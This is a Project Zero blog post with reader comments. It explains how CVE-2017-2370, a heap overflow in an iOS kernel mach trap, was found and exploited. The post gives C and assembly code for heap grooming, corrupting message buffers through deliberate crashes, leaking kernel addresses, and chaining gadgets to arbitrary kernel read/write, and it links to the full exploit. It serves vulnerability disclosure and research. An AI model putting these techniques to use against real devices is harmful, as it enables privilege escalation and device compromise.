Tuesday, April 18, 2017

Exception-oriented exploitation on iOS

Posted by Ian Beer, Project Zero

This post covers the discovery and exploitation of CVE-2017-2370, a heap buffer overflow in the mach_voucher_extract_attr_recipe_trap mach trap. It covers the bug, the development of an exploitation technique which involves repeatedly and deliberately crashing and how to build live kernel introspection features using old kernel exploits.

It’s a trap!
Alongside a large number of BSD syscalls (like ioctl, mmap, execve and so on) XNU also has a small number of extra syscalls supporting the MACH side of the kernel called mach traps. Mach trap syscall numbers start at 0x1000000. Here’s a snippet from the syscall_sw.c file where the trap table is defined:

/* 12 */ MACH_TRAP(_kernelrpc_mach_vm_deallocate_trap, 3, 5, munge_wll),
/* 13 */ MACH_TRAP(kern_invalid, 0, 0, NULL),
/* 14 */ MACH_TRAP(_kernelrpc_mach_vm_protect_trap, 5, 7, munge_wllww),

Most of the mach traps are fast-paths for kernel APIs that are also exposed via the standard MACH MIG kernel apis. For example mach_vm_allocate is also a MIG RPC which can be called on a task port.

Mach traps provide a faster interface to these kernel functions by avoiding the serialization and deserialization overheads involved in calling kernel MIG APIs. But without that autogenerated code complex mach traps often have to do lots of manual argument parsing which is tricky to get right.

In iOS 10 a new entry appeared in the mach_traps table:

/* 72 */ MACH_TRAP(mach_voucher_extract_attr_recipe_trap, 4, 4, munge_wwww),

The mach trap entry code will pack the arguments passed to that trap by userspace into this structure:

 struct mach_voucher_extract_attr_recipe_args {
   PAD_ARG_(mach_port_name_t, voucher_name);
   PAD_ARG_(mach_voucher_attr_key_t, key);
   PAD_ARG_(mach_voucher_attr_raw_recipe_t, recipe);
   PAD_ARG_(user_addr_t, recipe_size);
 };

A pointer to that structure will then be passed to the trap implementation as the first argument. It’s worth noting at this point that adding a new syscall like this means it can be called from every sandboxed process on the system. Up until you reach a mandatory access control hook (and there are none here) the sandbox provides no protection.

Let’s walk through the trap code:

kern_return_t
mach_voucher_extract_attr_recipe_trap(
 struct mach_voucher_extract_attr_recipe_args *args)
{
 ipc_voucher_t voucher = IV_NULL;
 kern_return_t kr = KERN_SUCCESS;
 mach_msg_type_number_t sz = 0;

 if (copyin(args->recipe_size, (void *)&sz, sizeof(sz)))
   return KERN_MEMORY_ERROR;

copyin has similar semantics to copy_from_user on Linux. This copies 4 bytes from the userspace pointer args->recipe_size to the sz variable on the kernel stack, ensuring that the whole source range really is in userspace and returning an error code if the source range either wasn’t completely mapped or pointed to kernel memory. The attacker now controls sz.

 if (sz > MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE)
   return MIG_ARRAY_TOO_LARGE;

mach_msg_type_number_t is a 32-bit unsigned type so sz has to be less than or equal to MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE (5120) to continue.

 voucher = convert_port_name_to_voucher(args->voucher_name);
 if (voucher == IV_NULL)
   return MACH_SEND_INVALID_DEST;

convert_port_name_to_voucher looks up the args->voucher_name mach port name in the calling task’s mach port namespace and checks whether it names an ipc_voucher object, returning a reference to the voucher if it does. So we need to provide a valid voucher port as voucher_name to continue past here.

 if (sz < MACH_VOUCHER_TRAP_STACK_LIMIT) {
   /* keep small recipes on the stack for speed */
   uint8_t krecipe[sz];
   if (copyin(args->recipe, (void *)krecipe, sz)) {
     kr = KERN_MEMORY_ERROR;
       goto done;
   }
   kr = mach_voucher_extract_attr_recipe(voucher,
            args->key, (mach_voucher_attr_raw_recipe_t)krecipe, &sz);

   if (kr == KERN_SUCCESS && sz > 0)
     kr = copyout(krecipe, (void *)args->recipe, sz);
 }

If sz was less than MACH_VOUCHER_TRAP_STACK_LIMIT (256) then this allocates a small variable-length-array on the kernel stack and copies in sz bytes from the userspace pointer in args->recipe to that VLA. The code then calls the target mach_voucher_extract_attr_recipe method before calling copyout (which takes its kernel and userspace arguments the other way round to copyin) to copy the results back to userspace. All looks okay, so let’s take a look at what happens if sz was too big to let the recipe be “kept on the stack for speed”:

 else {
   uint8_t *krecipe = kalloc((vm_size_t)sz);
   if (!krecipe) {
     kr = KERN_RESOURCE_SHORTAGE;
     goto done;
   }

   if (copyin(args->recipe, (void *)krecipe, args->recipe_size)) {
     kfree(krecipe, (vm_size_t)sz);
     kr = KERN_MEMORY_ERROR;
     goto done;
   }

The code continues on but let’s stop here and look really carefully at that snippet. It calls kalloc to make an sz-byte sized allocation on the kernel heap and assigns the address of that allocation to krecipe. It then calls copyin to copy args->recipe_size bytes from the args->recipe userspace pointer to the krecipe kernel heap buffer.

If you didn’t spot the bug yet, go back up to the start of the code snippets and read through them again. This is a case of a bug that’s so completely wrong that at first glance it actually looks correct!

To explain the bug it’s worth donning our detective hat and trying to work out what happened to cause such code to be written. This is just conjecture but I think it’s quite plausible.

a recipe for copypasta
Right above the mach_voucher_extract_attr_recipe_trap method in mach_kernelrpc.c there’s the code for host_create_mach_voucher_trap, another mach trap.

These two functions look very similar. They both have a branch for a small and large input size, with the same /* keep small recipes on the stack for speed */ comment in the small path and they both make a kernel heap allocation in the large path.

It’s pretty clear that the code for mach_voucher_extract_attr_recipe_trap has been copy-pasted from host_create_mach_voucher_trap then updated to reflect the subtle difference in their prototypes. That difference is that the size argument to host_create_mach_voucher_trap is an integer but the size argument to mach_voucher_extract_attr_recipe_trap is a pointer to an integer.

This means that mach_voucher_extract_attr_recipe_trap requires an extra level of indirection; it first needs to copyin the size before it can use it. Even more confusingly the size argument in the original function was called recipes_size and in the newer function it’s called recipe_size (one fewer ‘s’.)

Here’s the relevant code from the two functions, the first snippet is fine and the second has the bug:

host_create_mach_voucher_trap:

if (copyin(args->recipes, (void *)krecipes, args->recipes_size)) {
 kfree(krecipes, (vm_size_t)args->recipes_size);
 kr = KERN_MEMORY_ERROR;
 goto done;
}

mach_voucher_extract_attr_recipe_trap:

 if (copyin(args->recipe, (void *)krecipe, args->recipe_size)) {
   kfree(krecipe, (vm_size_t)sz);
   kr = KERN_MEMORY_ERROR;
   goto done;
 }

My guess is that the developer copy-pasted the code for the entire function then tried to add the extra level of indirection but forgot to change the third argument to the copyin call shown above. They built XNU and looked at the compiler error messages. XNU builds with clang, which gives you fancy error messages like this:

error: no member named 'recipes_size' in 'struct mach_voucher_extract_attr_recipe_args'; did you mean 'recipe_size'?
if (copyin(args->recipes, (void *)krecipes, args->recipes_size)) {
                                                 ^~~~~~~~~~~~
                                                 recipe_size

Clang assumes that the developer has made a typo and typed an extra ‘s’. Clang doesn’t realize that its suggestion is semantically totally wrong and will introduce a critical memory corruption issue. I think that the developer took clang’s suggestion, removed the ‘s’, rebuilt and the code compiled without errors.

Building primitives
copyin on iOS will fail if the size argument is greater than 0x4000000. Since recipes_size also needs to be a valid userspace pointer this means we have to be able to map an address that low. From a 64-bit iOS app we can do this by giving the pagezero_size linker option a small value. We can completely control the size of the copy by ensuring that our data is aligned right up to the end of a page and then unmapping the page after it. copyin will fault when the copy reaches unmapped source page and stop.

If the copyin fails the kalloced buffer will be immediately freed.

Putting all the bits together we can make a kalloc heap allocation of between 256 and 5120 bytes and overflow out of it as much as we want with completely controlled data.

When I’m working on a new exploit I spend a lot of time looking for new primitives; for example objects  allocated on the heap which if I could overflow into it I could cause a chain of interesting things to happen. Generally interesting means if I corrupt it I can use it to build a better primitive. Usually my end goal is to chain these primitives to get an arbitrary, repeatable and reliable memory read/write.

To this end one style of object I’m always on the lookout for is something that contains a length or size field which can be corrupted without having to fully corrupt any pointers. This is usually an interesting target and warrants further investigation.

For anyone who has ever written a browser exploit this will be a familiar construct!

ipc_kmsg
Reading through the XNU code for interesting looking primitives I came across struct ipc_kmsg:

struct ipc_kmsg {
 mach_msg_size_t            ikm_size;
 struct ipc_kmsg            *ikm_next;
 struct ipc_kmsg            *ikm_prev;
 mach_msg_header_t          *ikm_header;
 ipc_port_t                 ikm_prealloc;
 ipc_port_t                 ikm_voucher;
 mach_msg_priority_t        ikm_qos;
 mach_msg_priority_t        ikm_qos_override
 struct ipc_importance_elem *ikm_importance;
 queue_chain_t              ikm_inheritance;
};

This is a structure which has a size field that can be corrupted without needing to know any pointer values. How is the ikm_size field used?

Looking for cross references to ikm_size in the code we can see it’s only used in a handful of places:

void ipc_kmsg_free(ipc_kmsg_t kmsg);

This function uses kmsg->ikm_size to free the kmsg back to the correct kalloc zone. The zone allocator will detect frees to the wrong zone and panic so we’ll have to be careful that we don’t free a corrupted ipc_kmsg without first fixing up the size.

This macro is used to set the ikm_size field:

#define ikm_init(kmsg, size)  \
MACRO_BEGIN                   \
(kmsg)->ikm_size = (size);   \

This macro uses the ikm_size field to set the ikm_header pointer:

#define ikm_set_header(kmsg, mtsize)                       \
MACRO_BEGIN                                                \
(kmsg)->ikm_header = (mach_msg_header_t *)                 \
((vm_offset_t)((kmsg) + 1) + (kmsg)->ikm_size - (mtsize)); \
MACRO_END

That macro is using the ikm_size field to set the ikm_header field such that the message is aligned to the end of the buffer; this could be interesting.

Finally there’s a check in ipc_kmsg_get_from_kernel:

 if (msg_and_trailer_size > kmsg->ikm_size - max_desc) {
   ip_unlock(dest_port);
   return MACH_SEND_TOO_LARGE;
 }

That’s using the ikm_size field to ensure that there’s enough space in the ikm_kmsg buffer for a message.

It looks like if we corrupt the ikm_size field we’ll be able to make the kernel believe that a message buffer is bigger than it really is which will almost certainly lead to message contents being written out of bounds. But haven’t we just turned a kernel heap overflow into... another kernel heap overflow? The difference this time is that a corrupted ipc_kmsg might also let me read memory out of bounds. This is why corrupting the ikm_size field could be an interesting thing to investigate.

It’s about sending a message
ikm_kmsg structures are used to hold in-transit mach messages. When userspace sends a mach message we end up in ipc_kmsg_alloc. If the message is small (less than IKM_SAVED_MSG_SIZE) then the code will first look in a cpu-local cache for recently freed ikm_kmsg structures. If none are found it will allocate a new cacheable message from the dedicated ipc.kmsg zalloc zone.

Larger messages bypass this cache are are directly allocated by kalloc, the general purpose kernel heap allocator. After allocating the buffer the structure is immediately initialized using the two macros we saw:

 kmsg = (ipc_kmsg_t)kalloc(ikm_plus_overhead(max_expanded_size));
...  
 if (kmsg != IKM_NULL) {
   ikm_init(kmsg, max_expanded_size);
   ikm_set_header(kmsg, msg_and_trailer_size);
 }

 return(kmsg);

Unless we’re able to corrupt the ikm_size field in between those two macros the most we’d be able to do is cause the message to be freed to the wrong zone and immediately panic. Not so useful.

But ikm_set_header is called in one other place: ipc_kmsg_get_from_kernel.

This function is only used when the kernel sends a real mach message; it’s not used for sending replies to kernel MIG apis for example. The function’s comment explains more:

* Routine: ipc_kmsg_get_from_kernel
* Purpose:
* First checks for a preallocated message
* reserved for kernel clients.  If not found -
* allocates a new kernel message buffer.
* Copies a kernel message to the message buffer.

Using the mach_port_allocate_full method from userspace we can allocate a new mach port which has a single preallocated ikm_kmsg buffer of a controlled size. The intended use-case is to allow userspace to receive critical messages without the kernel having to make a heap allocation. Each time the kernel sends a real mach message it first checks whether the port has one of these preallocated buffers and it’s not currently in-use. We then reach the following code (I’ve removed the locking and 32-bit only code for brevity):

 if (IP_VALID(dest_port) && IP_PREALLOC(dest_port)) {
   mach_msg_size_t max_desc = 0;
   
   kmsg = dest_port->ip_premsg;
   if (ikm_prealloc_inuse(kmsg)) {
     ip_unlock(dest_port);
     return MACH_SEND_NO_BUFFER;
   }

   if (msg_and_trailer_size > kmsg->ikm_size - max_desc) {
     ip_unlock(dest_port);
     return MACH_SEND_TOO_LARGE;
   }
   ikm_prealloc_set_inuse(kmsg, dest_port);
   ikm_set_header(kmsg, msg_and_trailer_size);
   ip_unlock(dest_port);
...  
 (void) memcpy((void *) kmsg->ikm_header, (const void *) msg, size);

This code checks whether the message would fit (trusting kmsg->ikm_size), marks the preallocated buffer as in-use, calls the ikm_set_header macro to which sets ikm_header such that the message will align to the end the of the buffer and finally calls memcpy to copy the message into the ipc_kmsg.
This means that if we can corrupt the ikm_size field of a preallocated ipc_kmsg and make it appear larger than it is then when the kernel sends a message it will write the message contents off the end of the preallocate message buffer.

ikm_header is also used in the mach message receive path, so when we dequeue the message it will also read out of bounds. If we could replace whatever was originally after the message buffer with data we want to read we could then read it back as part of the contents of the message.

This new primitive we’re building is more powerful in another way: if we get this right we’ll be able to read and write out of bounds in a repeatable, controlled way without having to trigger a bug each time.

Exceptional behaviour
There’s one difficulty with preallocated messages: because they’re only used when the kernel send a message to us we can’t just send a message with controlled data and get it to use the preallocated ipc_kmsg. Instead we need to persuade the kernel to send us a message with data we control, this is much harder!

There are only and handful of places where the kernel actually sends userspace a mach message. There are various types of notification messages like IODataQueue data-available notifications, IOServiceUserNotifications and no-senders notifications. These usually only contains a small amount of user-controlled data. The only message types sent by the kernel which seem to contain a decent amount of user-controlled data are exception messages.

When a thread faults (for example by accessing unallocated memory or calling a software breakpoint instruction) the kernel will send an exception message to the thread’s registered exception handler port.

If a thread doesn’t have an exception handler port the kernel will try to send the message to the task’s exception handler port and if that also fails the exception message will be delivered to to global host exception port. A thread can normally set its own exception port but setting the host exception port is a privileged action.

routine thread_set_exception_ports(
        thread         : thread_act_t;
        exception_mask : exception_mask_t;
        new_port       : mach_port_t;
        behavior       : exception_behavior_t;
        new_flavor     : thread_state_flavor_t);

This is the MIG definition for thread_set_exception_ports. new_port should be a send right to the new exception port. exception_mask lets us restrict the types of exceptions we want to handle. behaviour defines what type of exception message we want to receive and new_flavor lets us specify what kind of process state we want to be included in the message.

Passing an exception_mask of EXC_MASK_ALL, EXCEPTION_STATE for behavior and ARM_THREAD_STATE64 for new_flavor means that the kernel will send an exception_raise_state message to the exception port we specify whenever the specified thread faults. That message will contain the state of all the ARM64 general purposes registers, and that’s what we’ll use to get controlled data written off the end of the ipc_kmsg buffer!

Some assembly required...
In our iOS XCode project we can added a new assembly file and define a function load_regs_and_crash:

.text
.globl  _load_regs_and_crash
.align  2
_load_regs_and_crash:
mov x30, x0
ldp x0, x1, [x30, 0]
ldp x2, x3, [x30, 0x10]
ldp x4, x5, [x30, 0x20]
ldp x6, x7, [x30, 0x30]
ldp x8, x9, [x30, 0x40]
ldp x10, x11, [x30, 0x50]
ldp x12, x13, [x30, 0x60]
ldp x14, x15, [x30, 0x70]
ldp x16, x17, [x30, 0x80]
ldp x18, x19, [x30, 0x90]
ldp x20, x21, [x30, 0xa0]
ldp x22, x23, [x30, 0xb0]
ldp x24, x25, [x30, 0xc0]
ldp x26, x27, [x30, 0xd0]
ldp x28, x29, [x30, 0xe0]
brk 0
.align  3

This function takes a pointer to a 240 byte buffer as the first argument then assigns each of the first 30 ARM64 general-purposes registers values from that buffer such that when it triggers a software interrupt via brk 0 and the kernel sends an exception message that message contains the bytes from the input buffer in the same order.

We’ve now got a way to get controlled data in a message which will be sent to a preallocated port, but what value should we overwrite the ikm_size with to get the controlled portion of the message to overlap with the start of the following heap object? It’s possible to determine this statically, but it would be much easier if we could just use a kernel debugger and take a look at what happens. However iOS only runs on very locked-down hardware with no supported way to do kernel debugging.

I’m going to build my own kernel debugger (with printfs and hexdumps)
A proper debugger has two main features: breakpoints and memory peek/poke. Implementing breakpoints is a lot of work but we can still build a meaningful kernel debugging environment just using kernel memory access.

There’s a bootstrapping problem here; we need a kernel exploit which gives us kernel memory access in order to develop our kernel exploit to give us kernel memory access!  In December I published the mach_portal iOS kernel exploit which gives you kernel memory read/write and as part of that I wrote a handful of kernel introspections functions which allowed you to find process task structures and lookup mach port objects by name. We can build one more level on that and dump the kobject pointer of a mach port.

The first version of this new exploit was developed inside the mach_portal xcode project so I could reuse all the code. After everything was working I ported it from iOS 10.1.1 to iOS 10.2.

Inside mach_portal I was able to find the address of an preallocated port buffer like this:

 // allocate an ipc_kmsg:
 kern_return_t err;
 mach_port_qos_t qos = {0};
 qos.prealloc = 1;
 qos.len = size;
 
 mach_port_name_t name = MACH_PORT_NULL;
 
 err = mach_port_allocate_full(mach_task_self(),
                               MACH_PORT_RIGHT_RECEIVE,
                               MACH_PORT_NULL,
                               &qos,
                               &name);

 uint64_t port = get_port(name);
 uint64_t prealloc_buf = rk64(port+0x88);
 printf("0x%016llx,\n", prealloc_buf);

get_port was part of the mach_portal exploit and is defined like this:

uint64_t get_port(mach_port_name_t port_name){
 return proc_port_name_to_port_ptr(our_proc, port_name);
}

uint64_t proc_port_name_to_port_ptr(uint64_t proc, mach_port_name_t port_name) {
 uint64_t ports = get_proc_ipc_table(proc);
 uint32_t port_index = port_name >> 8;
 uint64_t port = rk64(ports + (0x18*port_index)); //ie_object
 return port;
}

uint64_t get_proc_ipc_table(uint64_t proc) {
 uint64_t task_t = rk64(proc + struct_proc_task_offset);
 uint64_t itk_space = rk64(task_t + struct_task_itk_space_offset);
 uint64_t is_table = rk64(itk_space + struct_ipc_space_is_table_offset);
 return is_table;
}

These code snippets are using the rk64() function provided by the mach_portal exploit which reads kernel memory via the kernel task port.

I used this method with some trial and error to determine the correct value to overwrite ikm_size to be able to align the controlled portion of an exception message with the start of the next heap object.

get-where-what
The final piece of the puzzle is the ability know where controlled data is; rather than write-what-where we want to get where what is.

One way to achieve this in the context of a local privilege escalation exploit is to place this kind of data in userspace but hardware mitigations like SMAP on x86 and the AMCC hardware on iPhone 7 make this harder. Therefore we’ll construct a new primitive to find out where our ipc_kmsg buffer is in kernel memory.

One aspect I haven’t touched on up until now is how to get the ipc_kmsg allocation next to the buffer we’ll overflow out of. Stefan Esser has covered the evolution of the zalloc heap for the last few years in a series of conference talks, the latest talk has details of the zone freelist randomization.

Whilst experimenting with the heap behaviour using the introspection techniques described above I noticed that some size classes would actually still give you close to linear allocation behavior (later allocations are contiguous.) It turns out this is due to the lower-level allocator which zalloc gets pages from; by exhausting a particular zone we can force zalloc to fetch new pages and if our allocation size is close to the page size we’ll just get that page back immediately.

This means we can use code like this:

 int prealloc_size = 0x900; // kalloc.4096
 
 for (int i = 0; i < 2000; i++){
   prealloc_port(prealloc_size);
 }
 
 // these will be contiguous now, convenient!
 mach_port_t holder = prealloc_port(prealloc_size);
 mach_port_t first_port = prealloc_port(prealloc_size);
 mach_port_t second_port = prealloc_port(prealloc_size);
 
to get a heap layout like this:
This is not completely reliable; for devices with more RAM you’ll need to increase the iteration count for the zone exhaustion loop. It’s not a perfect technique but works perfectly well enough for a research tool.

We can now free the holder port; trigger the overflow which will reuse the slot where holder was and overflow into first_port then grab the slot again with another holder port:

 // free the holder:
 mach_port_destroy(mach_task_self(), holder);

 // reallocate the holder and overflow out of it
 uint64_t overflow_bytes[] = {0x1104,0,0,0,0,0,0,0};
 do_overflow(0x1000, 64, overflow_bytes);
 
 // grab the holder again
 holder = prealloc_port(prealloc_size);
The overflow has changed the ikm_size field of the preallocated ipc_kmsg belonging to first port to 0x1104.

After the ipc_kmsg structure has been filled in by ipc_get_kmsg_from_kernel it will be enqueued into the target port’s queue of pending messages by ipc_kmsg_enqueue:

void ipc_kmsg_enqueue(ipc_kmsg_queue_t queue,
                     ipc_kmsg_t       kmsg)
{
 ipc_kmsg_t first = queue->ikmq_base;
 ipc_kmsg_t last;

 if (first == IKM_NULL) {
   queue->ikmq_base = kmsg;
   kmsg->ikm_next = kmsg;
   kmsg->ikm_prev = kmsg;
 } else {
   last = first->ikm_prev;
   kmsg->ikm_next = first;
   kmsg->ikm_prev = last;
   first->ikm_prev = kmsg;
   last->ikm_next = kmsg;
 }
}

If the port has pending messages the ikm_next and ikm_prev fields of the ipc_kmsg form a doubly-linked list of pending messages. But if the port has no pending messages then ikm_next and ikm_prev are both set to point back to kmsg itself. The following interleaving of messages sends and receives will allow us use this fact to read back the address of the second ipc_kmsg buffer:

 uint64_t valid_header[] = {0xc40, 0, 0, 0, 0, 0, 0, 0};
 send_prealloc_msg(first_port, valid_header, 8);
 
 // send a message to the second port
 // writing a pointer to itself in the prealloc buffer
 send_prealloc_msg(second_port, valid_header, 8);
 
 // receive on the first port, reading the header of the second:
 uint64_t* buf = receive_prealloc_msg(first_port);
 
 // this is the address of second port
 kernel_buffer_base = buf[1];
Here’s the implementation of send_prealloc_msg:

void send_prealloc_msg(mach_port_t port, uint64_t* buf, int n) {
 struct thread_args* args = malloc(sizeof(struct thread_args));
 memset(args, 0, sizeof(struct thread_args));
 memcpy(args->buf, buf, n*8);
 
 args->exception_port = port;
 
 // start a new thread passing it the buffer and the exception port
 pthread_t t;
 pthread_create(&t, NULL, do_thread, (void*)args);
 
 // associate the pthread_t with the port
 // so that we can join the correct pthread
 // when we receive the exception message and it exits:
 kern_return_t err = mach_port_set_context(mach_task_self(),
                                           port,
                                           (mach_port_context_t)t);

 // wait until the message has actually been sent:
 while(!port_has_message(port)){;}
}

Remember that to get the controlled data into port’s preallocated ipc_kmsg we need the kernel to send the exception message to it, so send_prealloc_msg actually has to cause that exception. It allocates a struct thread_args which contains a copy of the controlled data we want in the message and the target port then it starts a new thread which will call do_thread:

void* do_thread(void* arg) {
 struct thread_args* args = (struct thread_args*)arg;
 uint64_t buf[32];
 memcpy(buf, args->buf, sizeof(buf));
 
 kern_return_t err;
 err = thread_set_exception_ports(mach_thread_self(),
                                  EXC_MASK_ALL,
                                  args->exception_port,
                                  EXCEPTION_STATE,
                                  ARM_THREAD_STATE64);
 free(args);
 
 load_regs_and_crash(buf);
 return NULL;
}

do_thread copies the controlled data from the thread_args structure to a local buffer then sets the target port as this thread’s exception handler. It frees the arguments structure then calls load_regs_and_crash which is the assembler stub that copies the buffer into the first 30 ARM64 general purpose registers and triggers a software breakpoint.

At this point the kernel’s interrupt handler will call exception_deliver which will look up the thread’s exception port and call the MIG mach_exception_raise_state method which will serialize the crashing thread’s register state into a MIG message and call mach_msg_rpc_from_kernel_body which will grab the exception port’s preallocated ipc_kmsg, trust the ikm_size field and use it to align the sent message to what it believes to be the end of the buffer:
In order to actually read data back we need to receive the exception message. In this case we got the kernel to send a message to the first port which had the effect of writing a valid header over the second port. Why use a memory corruption primitive to overwrite the next message’s header with the same data it already contains?

Note that if we just send the message and immediately receive it we’ll read back what we wrote. In order to read back something interesting we have to change what’s there. We can do that by sending a message to the second port after we’ve sent the message to the first port but before we’ve received it.

We observed before that if a port’s message queue is empty when a message is enqueued the ikm_next field will point back to the message itself. So by sending a message to second_port (overwriting it’s header with one what makes the ipc_kmsg still be valid and unused) then reading back the message sent to first port we can determine the address of the second port’s ipc_kmsg buffer.

read/write to arbitrary read/write
We’ve turned our single heap overflow into the ability to reliably overwrite and read back the contents of a 240 byte region after the first_port ipc_kmsg object as often as we want. We also know where that region is in the kernel’s virtual address space. The final step is to turn that into the ability to read and write arbitrary kernel memory.

For the mach_portal exploit I went straight for the kernel task port object. This time I chose to go a different path and build on a neat trick I saw in the Pegasus exploit detailed in the Lookout writeup.

Whoever developed that exploit had found that the IOKit Serializer::serialize method is a very neat gadget that lets you turn the ability to call a function with one argument that points to controlled data into the ability to call another controlled function with two completely controlled arguments.

In order to use this we need to be able to call a controlled address passing a pointer to controlled data. We also need to know the address of OSSerializer::serialize.

Let’s free second_port and reallocate an IOKit userclient there:

 // send another message on first
 // writing a valid, safe header back over second
 send_prealloc_msg(first_port, valid_header, 8);
 
 // free second and get it reallocated as a userclient:
 mach_port_deallocate(mach_task_self(), second_port);
 mach_port_destroy(mach_task_self(), second_port);
 
 mach_port_t uc = alloc_userclient();
 
 // read back the start of the userclient buffer:
 buf = receive_prealloc_msg(first_port);

 // save a copy of the original object:
 memcpy(legit_object, buf, sizeof(legit_object));
 
 // this is the vtable for AGXCommandQueue
 uint64_t vtable = buf[0];

alloc_userclient allocates user client type 5 of the AGXAccelerator IOService which is an AGXCommandQueue object. IOKit’s default operator new uses kalloc and AGXCommandQueue is 0xdb8 bytes so it will also use the kalloc.4096 zone and reuse the memory just freed by the second_port ipc_kmsg.

Note that we sent another message with a valid header to first_port which overwrote second_port’s header with a valid header. This is so that after second_port is freed and the memory reused for the user client we can dequeue the message from first_port and read back the first 240 bytes of the AGXCommandQueue object. The first qword is a pointer to the AGXCommandQueue’s vtable, using this we can determine the KASLR slide thus work out the address of OSSerializer::serialize.

Calling any IOKit MIG method on the AGXCommandQueue userclient will likely result in at least three virtual calls: ::retain() will be called by iokit_lookup_connect_port by the MIG intran for the userclient port. This method also calls ::getMetaClass(). Finally the MIG wrapper will call iokit_remove_connect_reference which will call ::release().

Since these are all C++ virtual methods they will pass the this pointer as the first (implicit) argument meaning that we should be able to fulfil the requirement to be able to use the OSSerializer::serialize gadget. Let’s look more closely at exactly how that works:

class OSSerializer : public OSObject
{
 OSDeclareDefaultStructors(OSSerializer)

 void * target;
 void * ref;
 OSSerializerCallback callback;

 virtual bool serialize(OSSerialize * serializer) const;
};

bool OSSerializer::serialize( OSSerialize * s ) const
{
 return( (*callback)(target, ref, s) );
}

It’s clearer what’s going on if we look as the disassembly of OSSerializer::serialize:

; OSSerializer::serialize(OSSerializer *__hidden this, OSSerialize *)

MOV  X8, X1
LDP  X1, X3, [X0,#0x18] ; load X1 from [X0+0x18] and X3 from [X0+0x20]
LDR  X9, [X0,#0x10]     ; load X9 from [X0+0x10]
MOV  X0, X9
MOV  X2, X8
BR   X3                 ; call [X0+0x20] with X0=[X0+0x10] and X1=[X0+0x18]

Since we have read/write access to the first 240 bytes of the AGXCommandQueue userclient and we know where it is in memory we can replace it with the following fake object which will turn a virtual call to ::release into a call to an arbitrary function pointer with two controlled arguments:
We’ve redirected the vtable pointer to point back to this object so we can interleave the vtable entries we need along with the data. We now just need one more primitive on top of this to turn an arbitrary function call with two controlled arguments into an arbitrary memory read/write.

Functions like copyin and copyout are the obvious candidates as they will handle any complexities involved in copying across the user/kernel boundary but they both take three arguments: source, destination and size and we can only completely control two.

However since we already have the ability to read and write this fake object from userspace we can actually just copy values to and from this kernel buffer rather than having to copy to and from userspace directly. This means we can expand our search to any memory copying functions like memcpy. Of course memcpy, memmove and bcopy all also take three arguments so what we need is a wrapper around one of those which passes a fixed size.

Looking through the cross-references to those functions we find uuid_copy:

; uuid_copy(uuid_t dst, const uuid_t src)
MOV  W2, #0x10 ; size
B    _memmove

This function is just simple wrapper around memmove which always passes a fixed size of 16-bytes. Let’s integrate that final primitive into the serializer gadget:
To make the read into a write we just swap the order of the arguments to copy from an arbitrary address into our fake userclient object then receive the exception message to read the read data.

You can download my exploit for iOS 10.2 on iPod 6G here: https://bugs.chromium.org/p/project-zero/issues/detail?id=1004#c4

This bug was also independently discovered and exploited by Marco Grassi and qwertyoruiopz, check out their code to see a different approach to exploiting this bug which also uses mach ports.

Critical code should be criticised
Every developer makes mistakes and they’re a natural part of the software development process (especially when the compiler is egging you on!). However, brand new kernel code on the 1B+ devices running XNU deserves special attention. In my opinion this bug was a clear failure of the code review processes in place at Apple and I hope bugs and writeups like these are taken seriously and some lessons are learnt from them.

Perhaps most importantly: I think this bug would have been caught in development if the code had any tests. As well as having a critical security bug the code just doesn’t work at all for a recipe with a size greater than 256. On MacOS such a test would immediately kernel panic. I find it consistently surprising that the coding standards for such critical codebases don’t enforce the development of even basic regression tests.

XNU is not alone in this, it’s a common story across many codebases. For example LG shipped an Android kernel with a new custom syscall containing a trivial unbounded strcpy that was triggered by Chrome’s normal operation and for extra irony the custom syscall collided with the syscall number for sys_seccomp, the exact feature Chrome were trying to add support for to prevent such issues from being exploitable.

3 comments:

  1. Absolutely amazing work once again

    ReplyDelete
  2. One of my coding rules is to trace thru every code branch at least one, just to make sure that it works at all, even if I don't write persistent (unit) test code for it. If that had been done here, the bug would have been obvious as soon as the code segment for (sz >= MACH_VOUCHER_TRAP_STACK_LIMIT) would have been stepped through. Simple rule but very important.

    ReplyDelete
  3. Thank you for this! I've been itching to dive into mobile pen testing having a background more with x86 stack based pentesting I use to enjoy as a hobby during my teenage years this has rekindled my love for software hacking. I'm finding it generally difficult to dive into pentesting on iOS at all due to limited access from a non-jailbroken iPhone. Thanks again for this lovely breakdown!

    ReplyDelete